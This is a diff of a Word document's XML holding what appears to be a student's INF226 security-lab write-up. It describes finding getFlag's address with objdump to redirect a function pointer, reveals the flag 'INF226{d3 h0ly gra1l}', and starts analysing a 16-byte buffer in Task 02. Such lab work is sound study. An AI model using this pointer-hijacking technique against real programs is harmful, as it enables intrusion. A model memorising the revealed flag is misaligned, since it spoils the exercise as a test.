+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in order to get the function pointer to call it. I obtain the address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>= 0x4011d6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> through </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>objdump -d ./01</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the commandline (or the </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+            <w:kern w:val="0"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:t>stack visualization tool</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> provided).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3226,6 +3226,20 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
@@ -3276,7 +3290,33 @@
           <w:highlight w:val="yellow"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>NTS: The ‘line’ variable does not have to be that specific address… idk why. Also works with others. Figure out why somehow.</w:t>
+        <w:t xml:space="preserve">NTS: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">It seems the flag is surrendered even if other addresses are provided. Does this mean that the function pointer just has to be != NULL (i.e. point to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">any </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>function), and it points to getFlag either way..?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3339,23 +3379,23 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DAF7A79" wp14:editId="72AD7C07">
             <wp:extent cx="5972810" cy="1223645"/>
@@ -3372,7 +3412,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3439,90 +3479,77 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>INF226{d3 h0ly gra1l}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>INF226{d3 h0ly gra1l}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:t>Notes</w:t>
       </w:r>
     </w:p>
@@ -3538,6 +3565,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:noProof/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -3557,7 +3585,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3597,31 +3625,713 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The objdump for &lt;getFlag&gt; shows that the function begins at address 0x4011d6. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Plotting frames 01 into the XXXX, I see that the getFlag stack frame is of size 16:</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Task 02</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Observations: Source Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is responsible for surrendering the flag.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of 16-byte capacity is declared, and initialized with values {0,1,2,…,15}.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>n int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variable </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is initialized to 0. The</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> first</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> prompt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>m the program</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is printed, and the response input from user is stored in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
